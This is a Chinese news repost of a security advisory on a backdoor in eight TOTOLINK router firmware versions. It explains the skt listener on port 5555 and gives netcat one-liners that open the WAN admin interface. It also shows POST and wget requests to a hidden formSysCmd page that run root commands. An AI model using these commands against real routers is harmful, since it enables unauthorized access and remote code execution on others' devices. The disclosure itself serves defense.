占据韩国80%市场的TOTOLINK路由器被曝存后门

安全 黑客攻防 漏洞
通过分析最近一次的固件以及在真实路由器上进行测试后,研究人员发现8款TOTOLink产品中存在后门。

TOTOLINK路由器在韩国市场占有率达82.3%。由深圳众唐科技公司负责产品的研发、制造。

TOTOLINK路由器被曝存后门 5万路由器受影响

漏洞简述

通过分析最近一次的固件以及在真实路由器上进行测试后,研究人员发现8款TOTOLink产品中存在后门。

注:固件来自totolink.net以及totolink.cn

A850R-V1 : 最新固件 TOTOLINK-A850R-V1.0.1-B20150707.1612.web

F1-V2 : 最新固件 F1-V2.1.1-B20150708.1646.web

F2-V1 : 最新固件 F2-V2.1.0-B20150320.1611.web

N150RT-V2 : 最新固件 TOTOLINK-N150RT-V2.1.1-B20150708.1548.web

N151RT-V2 : 最新固件 TOTOLINK-N151RT-V2.1.1-B20150708.1559.web

N300RH-V2 : 最新固件 TOTOLINK-N300RH-V2.0.1-B20150708.1625.web

N300RH-V3 : 最新固件 TOTOLINK-N300RH-V3.0.0-B20150331.0858.web

N300RT-V2 : 最新固件 TOTOLINK-N300RT-V2.1.1-B20150708.1613.web

通过向WAN IP发送一个精心构造的请求,攻击者可以在网上打开HTTP远程管理界面。接着攻击者在HTTP原创管理界面中通过hidden/boafrm/formSysCmd形式使用远程代码执行,进而绕过认证系统。

初步估计大约有5万路由器受到后门影响。

后门细节

当路由器启动后会int.d脚本会执行/bin/skt文件

cat etc/init.d/rcS [...] # start web server boa skt&

skt是一个MIPS架构文件,其参数:

server: ./skt client: ./skt host cmd

使用模拟器,该二进制文件可以兼容 x86_64机器: sudo chroot . ./qemu-mips-static ./bin/skt

单独使用skt不带任何参数,将会启用一个端口为5555的TCP保护程序,担当回显服务器的角色。使用带参数的skt将通过5555端口向目标IP发送一个包含命令的TCP包。

skt的主要功能:

TcpClient是一个简单的TCP客户端

TcpServer就像一个回显服务器

TcpClient:将发送一个包含hel,xasf, oki,xasf 或者 bye,xasf的TCP包,这取决于使用的参数(1,2,3)

TcpServer:用来监听tcp/5555的回显服务器并比较用户提供的硬编码字符串("hel,xasf", "oki,xasf").

sub_400B50函数:

占据韩国80%市场的TOTOLINK路由器被曝存后门

sub_400B50函数的伪代码:

int32_t sub_400B50(int32_t a1, char *str, int32_t a3, int32_t a4, int32_t a5) {     if (strcmp(str, "hel,xasf") == 0) {         system("iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");     } else {         if (strcmp(str, "oki,xasf") == 0) {             system("iptables -D INPUT -p tcp --dport 80 -i eth1 -j ACCEPT");         }     }     [...] }

该函数比较用户指定的字符串,2个硬编码字符串执行system()。

分析运行在TOTOLINK设备上的二进制文件,显示服务器通过静默执行system()响应命令

1.通过将 "hel,xasf"发送给设备,设备将执行:

iptables -I INPUT -p tcp --dport 80 -i eth1 -j ACCEPT

这将在eth1接口(默认的WAN接口)80端口打开HTTP远程管理界面

2.通过将"oki,xasf"发送给设备,设备将执行:

iptables -D INPUT -p tcp –dport 80 -i eth1 -j ACCEPT

这是关闭HTTP原创管理界面

3.通过发送"bye,xasf"给设备,设备什么都不会做。

后门中的iptables命令都是"eth1"的硬编码,只有使用DHCP以及静态IP连接的设备才会受到影响,因为WAN IP依赖于eth1设备,而对于PPPoE连接没有任何影响

totolink# ifconfig ppp0      Link encap:Point-to-Point Protocol             inet addr:X.X.X.X  P-t-P:X.X.X.X  Mask:255.255.255.255           UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1438  Metric:1           RX packets:17308398 errors:0 dropped:0 overruns:0 frame:0           TX packets:2605290 errors:0 dropped:0 overruns:0 carrier:0           collisions:0 txqueuelen:64            RX bytes:2803138455 (2.6 GiB)  TX bytes:277402492 (264.5 MiB)

攻击者可以使用简单的netcat命令来测试后门:

1.打开HTTP远程管理界面

echo -ne "hel,xasf" | nc <ip> 5555

 

2.关闭HTTP远程管理界面

echo -ne "oki,xasf" | nc <ip> 5555

 

3.检测含漏洞路由器

echo -ne "GET / HTTP/1.1" | nc <ip> 5555 if you see "GET / HTTP/1.1" in the answer, you likely detected a vulnerable router.

通过后门打开HTTP远程管理界面:

占据韩国80%市场的TOTOLINK路由器被曝存后门

路由器管理页面中的远程命令执行漏洞

在最新固件中一个隐藏窗口允许攻击者以root权限执行命令:

POST /boafrm/formSysCmd HTTP/1.1 sysCmd=<cmd>&apply=Apply&msg=

攻击者可以使用wget在远程设备中执行命令:

wget --post-data='sysCmd=<cmd>&apply=Apply&msg=' http://ip//boafrm/formSysCmd

例如,向管理界面发送该HTTP请求,可以远程重启设备:

POST /boafrm/formSysCmd HTTP/1.1 sysCmd=reboot&apply=Apply&msg=

下面的wget命令和上面的命令类似:

wget --post-data='sysCmd=reboot&apply=Apply&msg=' http://ip//boafrm/formSysCmd
责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2015-10-12 11:11:56

2013-03-20 16:05:38

2013-10-21 11:37:03

腾达Tenda路由器

2014-08-27 18:09:05

2010-04-30 12:21:43

无线产品无线路由TOTOLINK

2013-12-04 13:51:04

D-Link路由器路由器后门

2018-08-14 16:50:00

硬件

2014-01-07 09:18:35

路由器后门后门Netgear路由器

2013-03-22 13:27:19

2015-02-03 16:09:35

2015-04-14 11:19:21

2014-07-22 13:16:11

iOSiOS安全后门

2015-01-12 11:05:40

路由器漏洞华硕路由器

2013-03-12 09:28:53

后门路由链路路由器路由器连接

2015-12-24 14:41:19

2012-09-17 20:30:12

路由器MLXe核心路由器博科

2009-11-12 13:22:19

路由器市场

2015-10-10 09:31:41

2013-11-14 10:06:10

2011-08-29 13:04:09

路由器设置路由器连接路由器
点赞
收藏

51CTO技术栈公众号